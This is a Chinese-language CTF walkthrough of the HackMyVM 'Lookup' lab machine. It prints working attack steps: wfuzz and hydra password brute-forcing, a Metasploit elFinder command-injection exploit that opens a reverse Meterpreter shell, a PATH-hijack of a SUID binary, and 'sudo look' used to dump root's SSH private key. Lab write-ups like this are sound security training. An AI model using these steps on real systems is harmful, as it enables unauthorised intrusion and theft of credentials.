靶机地址https://hackmyvm.eu/machines/machine.php?vm=Lookup
直接访问报错,需要在/etc/hosts里设置域名lookup.hmv,再次访问主页显示一个登录页面。
扫描目录没有发现什么敏感文件,也没有什么漏洞,sql注入也不行。只能尝试爆破,先尝试爆出用户名。这里要注意wfuzz的语法,特别是要用多个-H加入必要的头信息。
└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456" --hh 74 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 10177
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000086: 200 0 L 8 W 62 Ch "admin"
000004897: 200 0 L 8 W 62 Ch "jose"
Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0
得到两个用户名,再用这两个用户名尝试爆破密码。
└─$ wfuzz -c -w names.txt -w /usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&passwo
rd=FUZ2Z" --hh 62 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 25290
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000596: 200 0 L 10 W 74 Ch "admin - password123"
000013241: 302 0 L 0 W 0 Ch "jose - password123" 有效用户名和密码是第二项。在登录页面输入后,跳转到files.lookup.hmv,再次把这个域名加入到/etc/hosts。打开网站发现是elfinder,一个在线文件管理器。
查看版本后,发现可能有漏洞。在msfconsole里查找。
msf6 > search elfinder
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection
4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection 使用最后一个漏洞,成功得到shell。
msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set RHOSTS files.lookup.hmv
RHOSTS => files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set lhost 192.168.56.101
lhost => 192.168.56.101
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] Uploading payload 'RaDNuJN.jpg;echo 6370202e2e2f66696c65732f5261444e754a4e2e6a70672a6563686f2a202e6155304230662e706870 |xxd -r -p |sh& #.jpg' (1967 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.aU0B0f.php) ...
[*] Sending stage (39927 bytes) to 192.168.56.130
[+] Deleted .aU0B0f.php
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.130:49188) at 2024-09-24 08:56:59 +0800
...
meterpreter > shell
Process 1734 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/files.lookup.hmv/public_html/elFinder/php下面看如何提权。查找敏感文件。
find / -perm -u=s 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
...
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
...比较可疑的就是/usr/sbin/pwm。尝试运行一下。
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found可以将pwm下载到本机进行反编译
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+Fh] [rbp-131h]
FILE *stream; // [rsp+10h] [rbp-130h]
FILE *v6; // [rsp+18h] [rbp-128h]
char v7[64]; // [rsp+20h] [rbp-120h] BYREF
char s[112]; // [rsp+60h] [rbp-E0h] BYREF
char filename[104]; // [rsp+D0h] [rbp-70h] BYREF
unsigned __int64 v10; // [rsp+138h] [rbp-8h]
v10 = __readfsqword(0x28u);
puts("[!] Running 'id' command to extract the username and user ID (UID)");
snprintf(s, 0x64uLL, "id");
stream = popen(s, "r");
if ( stream )
{
if ( (unsigned int)__isoc99_fscanf(stream, "uid=%*u(%[^)])", v7) == 1 )
{
printf("[!] ID: %s\n", v7);
pclose(stream);
snprintf(filename, 0x64uLL, "/home/%s/.passwords", v7);
v6 = fopen(filename, "r");
if ( v6 )
{
while ( 1 )
{
v4 = fgetc(v6);
if ( v4 == -1 )
break;
putchar(v4);
}
fclose(v6);
return 0;
}
else
{
printf("[-] File /home/%s/.passwords not found\n", v7);
return 0;
}
}
else
{
perror("[-] Error reading username from id command\n");
return 1;
}
}
else
{
perror("[-] Error executing id command\n");
return 1;
}
}这个代码的核心是,运行系统的id命令,里面要包含“uid=id(name)”这样的标准信息,匹配name字符串,然后显示/home/name目录下的文件。这里的核心就是构建一个伪造的id命令,模仿系统id的回显。
PATH=/tmp:$PATH
echo "echo 'uid=1234(think)'" > id
chmod +x id
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
...列出的字符串中应该有think密码,这里爆破一下即可。
└─$ hydra -l think -P pass.txt ssh://192.168.56.130 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-24 09:29:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 20 tasks per 1 server, overall 20 tasks, 49 login tries (l:1/p:49), ~3 tries per task
[DATA] attacking ssh://192.168.56.130:22/
[22][ssh] host: 192.168.56.130 login: think password: josemario.AKA(think)最后就是得到root权限。
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
think@lookup:~$ LFILE=/root/.ssh/id_rsa
think@lookup:~$ sudo look '' "$LFILE"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf/h23TCH7qKRg4Penlti9RKW2XLSB5wR
Qcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM/zDb//ZlnlwCwKQ5XyTQU/vHfROfU0pnR
j7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR/+ybAIVbB+ya/D5r9DYPmatUTLlHD
...